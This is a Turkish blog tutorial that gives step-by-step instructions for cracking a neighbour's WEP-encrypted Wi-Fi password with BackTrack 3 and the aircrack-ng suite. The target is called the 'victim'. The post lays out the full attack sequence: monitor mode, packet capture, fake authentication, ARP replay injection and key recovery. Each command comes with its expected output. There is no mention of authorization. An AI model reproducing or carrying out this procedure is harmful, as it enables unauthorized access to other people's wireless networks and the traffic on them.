Wireless Þifresi Kýrma - (Wep) (Sayfa:1)
Bu döküman Tahribat.Com için yazýlmýþtýr.
Merhabalar, wireless aglarina son dönemde cogalan ilgiden ötürü ve bircok kez crack nasil yapilir sorulari üzerine bu konuya el atmak istedim.
Öncelikle sunu acikliyayim. Spoof ve Crack islemlerinde linux olmazsa olmaz gereksinimlerdendir. Linux`u zor, anlasilmaz sadece elit kisilerin kullanabilecegi görüntüsü bircok kisinin beynine islemis nedense. Bu tabuyu asmaliyiz.
Baslangic icin Wep sifreleme algoritmasina deginmemin sebebi, bu sifreleme sisteminin en kolay kirilmasindan dolayidir. Wpa algoritmasina ileriki asamalarda deginecegim.
Wireless sifre kirmasinin genel mantigi , hedefin mac adresi snifflenir, gidip gelen paketleri toplanilir, yeterli paket elde edildiginde mac adresi kopyalanir ve sifre elde edilir.
Her þeyin kolaylaþtýðý bu dönemlerde, bu iþlemi yapmak için sadece 5 dk bile yeterli olmaktadýr. Bu konu üzerine tasarlanmýþ olan BackTrack 3 linux modu, wireless cracking icin hertürlü yazilimi sunmaktadir.
Crackinge baþlamadan önce gereken temel 2 gereksinim var.
1- BackTrack 3
Download adresi: http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd
2- BackTrack 3 ile uyumlu çalýþan bir wireless kartý.
Uyumlu kart listesi: http://backtrack.offensive-security.com/index.php?title=HCL:Wireless
A) Ilk olarak BackTrack 3 ü indirin, boot cd olarak cd ye kaydedin. Bilgisayari cd`den baslatin. Sistem tam olarak acilana kadar sürekli enter tusuna basili tutun.
B) Menüden wlan monitöre girin ve cevrenizdeki wep olan wireless noktalarindan sinyali en yüksek olaninin mac adresini kopyalayin.
C) Simdi crack islemine basliyabiliriz. Öncelikle hangi bilgileri kullanacagimizi belirliyelim.
Kendi MAC Adresimiz: 00:0F:B5:88:AC:82
BSSID (Kurbanin MAC Adresi): 00:14:6C:7E:40:80
ESSID (Kurbanin Baglantisinin ismi): teddy
Access point kanali: 9
Wireless arayüzü: ath0
Bu veriler crack isleminde kullanilmis olan örnek veriler. Bunlari birebir kendi bilgilerinizle degistirmeniz gerekiyor.
A) Simdi sirayla su islemleri yapin.
1- Konsol u baslatin ve sunu yazin.
airmon-ng stop ath0
Suna benzer bir cevap gelmeli
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
2- Simdi sunu yazin
iwconfig
Suna benzer bir cevap gelmeli
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
3- Simdi sunu yazýn
airmon-ng start wifi0 9
Suna benzer bir cevap gelmeli
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
4- Tekrardan sunu yazin
iwconfig
Suna benzer bir cevap gelmeli
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
5- Simdi sunu yazin
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
Suna benzer bir cevap gelmeli
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Konsol penceresini kenara çekin , isleme devam etsin.
Buraya kadar her þey yolunda ise crack iþlemini yapmamýza az kaldý.
B) Yeni bir konsol penceresi açýn. Sunu yazýn
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Söyle bir cevap gelmeli
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
C) Yeni bir konsol penceresi daha açýn. Sunu yazýn
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Söyle bir cevap gelmeli
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
D) Yeni bir konsol penceresi daha açýn. Sunu yazýn
aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
Bu noktadan sonra eðer yeterli paket elde edildiyse söyle bir cevap gelecektir.
Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Eger böyle bir cevap elde edemediyseniz, ayni iþlemi daha fazla paket elde ettikten sonra tekrarlayýnýz. Ne kadar fazla paket elde ettiyseniz , þifrenin kýrýlmasý kesinleþecektir.
Kolay Gelsin.
Hiç yorum yok:
Yorum Gönder